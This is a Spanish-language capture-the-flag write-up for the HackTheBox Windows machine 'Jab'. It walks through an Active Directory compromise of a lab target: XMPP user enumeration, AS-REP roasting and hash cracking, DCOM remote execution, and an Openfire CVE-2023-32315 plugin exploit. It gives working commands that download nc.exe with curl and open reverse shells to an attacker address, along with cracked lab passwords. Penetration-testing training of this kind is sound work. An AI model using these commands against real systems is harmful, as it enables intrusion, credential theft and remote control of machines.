Jab
OS: Windows
Dificultad: Medio
Puntos: 30
Nmap
nmap -v -p 22,8080 -sV -sC -oN nmap.txt 10.10.11.7
Nmap scan report for 10.10.11.4
Host is up (0.095s latency).
Not shown: 65499 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-11 11:43:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
5222/tcp open jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| capabilities:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| features:
| stream_id: 4f6t6n3tnc
| unknown:
|_ compression_methods:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5223/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| capabilities:
| auth_mechanisms:
| features:
| errors:
| (timeout)
| unknown:
|_ compression_methods:
5262/tcp open jabber
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| capabilities:
| auth_mechanisms:
| features:
| errors:
| (timeout)
| unknown:
|_ compression_methods:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
5275/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| capabilities:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| features:
| stream_id: a7l130js5g
| unknown:
|_ compression_methods:
5276/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open realserver?
7443/tcp open ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49779/tcp open msrpc Microsoft Windows RPC
64318/tcp open msrpc Microsoft Windows RPC
Enumeration
El puerto 7070 esta ejecutando el servicio Openfire.
Si nos dirigimos al link que esta en la pagina web podemos obtener informacion acerca de la tecnologia usada.
BOSH was originally developed in the Jabber/XMPP community as a replacement for an even earlier HTTP-based technology called Jabber HTTP Polling (XEP-0025) [9]. Although BOSH assumes that the “payload” of HTTP requests and responses will be XML, the payload formats are not limited to XMPP stanzas (see XMPP Core [10]) and could contain a mixture of elements qualified by namespaces defined by different protocols (e.g., both XMPP and JSON). BOSH connection managers are generally not required to understand anything about the XML content that they transport beyond perhaps ensuring that each XML payload is qualified by the correct namespace.
XMPP Client
Necesitamos un client XMPP para conectarnos al servidor por lo tanto usaremos pidgin.
apt install pidgin
pidgin
Una vez que tengamos el client podemos crearnos un usuario para acceder.
Registramos nuestro usuario y con eso ya estaremos autenticados en el servidor XMPP.
XMPP Enumeration
Enumerando el servidor encontramos 2 rooms. La ruta para encontrarlas es la siguiente:
Buddies -> Join a Chat -> Room List -> Find Rooms
Despues de checar todo a detalle solo podemos acceder a la test2 pero no contiene informacion relevante, sin embargo podemos obtener una lista de usuarios pero nos encontraremos con el detalle de que no los podemos copiar por lo tanto obtendremos esa informacion de la siguiente forma.
Accounts -> Search for Users -> Search Directory
Search : *
Antes de oprimir OK abriremos la debug console.
Help -> Debug Window
Ahora si oprimimos OK y veremos todo el query que hace en la consola.
Guardamos el output y lo tratamos de la siguiente forma para solo quedarnos con los usuarios.
cat purple-debug.log| sed 's/value>/\n/g' | cut -d '<' -f 1 | grep '@jab.htb' | cut -d '@' -f 1 | uniq > users.txt
ASREPRoast
Con la lista de usarios podemos tratar de obtener hashes a traves de kerberos.
impacket-GetNPUsers -usersfile users.txt jab.htb/ -dc-ip 10.10.11.4
Despues de unos minutos se obtuvieron 3 hashes de los usuarios.
jmontgomery
lbradford
mlowe
Crack Hash
Utilizando john solo pudimos obtener el password de un hash.
┌──(root㉿kali)-[~/htb/Jab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121 ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:00:13 DONE (2024-04-11 07:00) 0.07315g/s 1049Kp/s 2890Kc/s 2890KC/s !SkicA!..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Utilizamos ese usuario y password para conectarnos por XMPP y encontramos mas credenciales.
svc_openfire : !@#$%^&*(1qazxsw
Bloodhound Enumeration
Enumeramos el directorio activo con bloodhound para posteriormente analizarlo.
┌──(root㉿kali)-[~/htb/Jab]
└─# python3 /opt/BloodHound.py/bloodhound.py -c all -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -d jab.htb -dc DC01.jab.htb -ns 10.10.11.4
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.jab.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
Analizando los privilegios que tiene el usuario svc_openfire podemos ver que tiene privilegios ExecuteDCOM.
DCOM Exec
Investigando sobre DCOM llegamos a varios blogs.
https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html
https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model
https://wadcoms.github.io/wadcoms/Impacket-DCOMExec/
Podemos obtener RCE de la siguiente forma.
impacket-dcomexec svc_openfire@10.10.11.4 'ping -n 1 10.10.14.105' -object MMC20 -nooutput
Obtenemos una reverse shell.
# Copiamos nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
# Levantamos servidor web
python3 -m http.server 80
# Ejecutamos los comando para obtener la reverse shell
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'mkdir c:\temp' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'curl 10.10.14.105/nc.exe -o c:\temp\nc.exe' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'c:\temp\nc.exe 10.10.14.105 1234 -e cmd.exe' -object MMC20 -nooutput
┌──(root㉿kali)-[~/htb/Jab]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.105] from (UNKNOWN) [10.10.11.4] 50235
Microsoft Windows [Version 10.0.17763.5458]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\windows\system32>whoami
whoami
jab\svc_openfire
Privilege Escalation
Ya que estamos dentro de la maquina identificamos que hay un par de puertos locales abiertos que estan relacionados con Openfire.
C:\windows\system32>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2620
TCP 127.0.0.1:389 127.0.0.1:49773 ESTABLISHED 644
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 1268
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 1268
Port Forwarding
Haremos un portforward para acceder a ese puerto con chisel. Descargamos el programa en la maquina.
python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe
Creamos el tunel de la siguiente forma.
┌──(root㉿kali)-[~/htb/Jab]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/04/12 01:10:05 server: Reverse tunnelling enabled
2024/04/12 01:10:05 server: Fingerprint RwtpW0NzHQeIOhAYQTZz7Q8soOlr7aawPPFHw9pkx4I=
2024/04/12 01:10:05 server: Listening on http://0.0.0.0:5555
c:\temp>chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
2024/04/12 04:11:13 client: Connecting to ws://10.10.14.105:5555
2024/04/12 04:11:13 client: Connected (Latency 101.4635ms)
Ahora podemos acceder al portal.
Openfire Remote Code Execution
Utilizando las credenciales del usuario svc_openfire podemos acceder al portal.
En nuestra investigacion del inicio relacionado con Openfire identificamos que podemos obtener RCE como lo mencionan los siguientes recursos.
https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT
Primero descargaremos el plugin openfire-management-tool-plugin.jar y lo subimos en el apartado de plugins.
Una vez que se suba el plugin iremos al apartado de Server Settings y seleccionaremos la opcion Management Tool.
Nos pedira el password que es 123 y accederemos correctamente. Posteriormente seleccionaremos la opcion system command para poder ejecutar comandos.
Obtenemos una reverse shell y finalizamos.
c:\temp\nc.exe 10.10.14.105 4444 -e cmd.exe